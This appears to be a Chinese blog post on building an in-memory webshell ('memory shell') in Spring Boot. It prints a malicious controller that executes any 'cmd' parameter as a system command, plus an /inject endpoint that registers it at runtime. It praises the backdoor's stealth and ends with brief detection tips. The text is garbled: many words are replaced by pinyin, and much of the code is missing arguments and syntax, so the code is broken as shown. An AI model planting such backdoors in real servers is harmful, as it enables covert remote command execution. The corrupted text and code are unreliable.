你有没有听说过SpringBoot里的“内存马”

说实话，听起来挺玄乎的。

其实它只是把恶意代码塞进JVM里等你跑应用时就Neng被触发。

不需要上传文件，只靠一行路由注入就Neng搞定。

先聊聊Controller到底干嘛

Controller就是处理HTTP请求的那帮人。

你访问 /hello，Spring会把请求交给对应的方法。

方法Ke以返回字符串、JSON，也Ke以拿到HttpServletRequest和HttpServletResponse。

所以只要你有这两个参数，Spring就Neng自动注入它们。

什么叫“内存马”

简单来说就是在程序运行时动态注入一个隐藏的后门。

一旦注入成功，你Ke以通过特定URL来执行系统命令。

Ru果重启应用，路由表被清空，后门也随之消失——这点让它geng隐蔽。

Controller内存马是怎么实现的

核心思路有三步：

拿到RequestMappingHandlerMapping实例

构造RequestMappingInfo对象

把恶意Controller和方法注册进去

第1步：获取handlerMapping

@Autowired直接注入hen方便，但Ru果你在JSP里写代码，就得手动取了。

@Autowired
private RequestMappingHandlerMapping handlerMapping;

第2步：构造路由规则

RequestMappingInfo mappingInfo = RequestMappingInfo
    .paths
    .methods
    .options
    .build;

第3步：动态注册恶意方法

EvilController evil = new EvilController;
Method method = EvilController.class.getMethod(
        "shell",
        HttpServletRequest.class,
        HttpServletResponse.class);
handlerMapping.registerMapping;

EvilController实现

public class EvilController {
    public void shell(HttpServletRequest req,
                      HttpServletResponse res) throws Exception {
        String cmd = req.getParameter;
        if ) {
            ProcessBuilder pb = new ProcessBuilder;
            pb.redirectErrorStream;
            Process p = pb.start;
            InputStream is = p.getInputStream;
            ByteArrayOutputStream baos = new ByteArrayOutputStream;
            byte buf = new byte;
            int len;
            while ) != -1) {
                baos.write;
            }
            res.getWriter.write);
        }
    }
}

触发方式

/inject就是演示入口。

访问一次后就会把 /shell 注册进路由表。再访问 /shell?cmd=whoami 就Nengkan到结果。

@GetMapping
public String inject throws Exception {
    // 构造映射信息
    RequestMappingInfo info =
        RequestMappingInfo.paths
                        .methods(RequestMethod.GET,
                                  RequestMethod.POST)
                        .options
                        .build;
    // 动态创建并注册
    EvilController evil = new EvilController;
    Method m =
        EvilController.class.getMethod("shell",
                                        HttpServletRequest.class,
                                        HttpServletResponse.class);
    handlerMapping.registerMapping;
    return "注入成功！访问 /shell?cmd=whoami 验证";
}

为什么不Neng重复注册同一路径？

Spring Boot默认不允许同一路径多次注册，否则启动会报错：“Ambiguous mapping”。所以第一次访问 /inject 成功后 访问会冲突。重启后就消失了——这正是内存马隐蔽性的一部分。

为什么要用这种方式而不是普通Filter或Servlet？

Aha！Filter只Neng拦截所有请求，需要全局配置；而这里我们只想要一个特定路径。geng重要的是Filter往往被安全扫描发现，而动态注册的@Controller在Actuator端点里kan不到，一般用户连日志dou没kan过。于是它geng难被捕捉到。

一下吧，这个东西到底有多酷？又有多危险？

Cool，因为你Ke以在不知道的情况下给别人留个后门；危险，因为只要对方知道路径，就Neng远程执行命令。别忘了它是驻留在JVM里的，一旦应用关闭，它就消失了——这也意味着不需要持久化存储文件，只靠一次HTTP调用即可完成植入。

小贴士：怎么防御？怎么检测？

#1 检查可疑接口：/inject、/shell等是否存在。不常见Zui好删掉或加权限检查。

#2 开启Actuator映射查kan器：/actuator/mappings Ke以列出所有Yi注册路径，kankan有没有奇怪的名字。

#3 日志监控：任何命令执行dou会产生输出，可通过日志审计捕获异常行为。

#4 权限Zui小化：不要给业务账号太大权限，让攻击者即使得到后门也受限于沙箱。

"说实话", Ru果你的项目Yi经部署完毕，Ke以先Zuo一次全站扫描，kan是否存在未授权路径或反射漏洞，这些dou是植入内存马的前置条件之一。

"害", 别忘了geng新依赖和安全补丁，因为hen多公开漏洞dou是因为老旧库导致的。

"咱就是说", 对于企业级应用，你应该把所有控制器dou放在安全审核通道，通过静态代码扫描工具提前排查可Neng可被滥用的方法签名。

"哈哈", Zui终目标还是让系统geng加稳健，Ru果发现异常请立刻停机排查，否则可Neng造成不可估量损失。

请记住：一个小小的路由注入可Neng就Neng打开整个服务器的大门。所以一定要保持警惕，并且对每一次改动dou审慎评估风险。

祝大家编码愉快，也祝你的服务器永远安然无恙！

---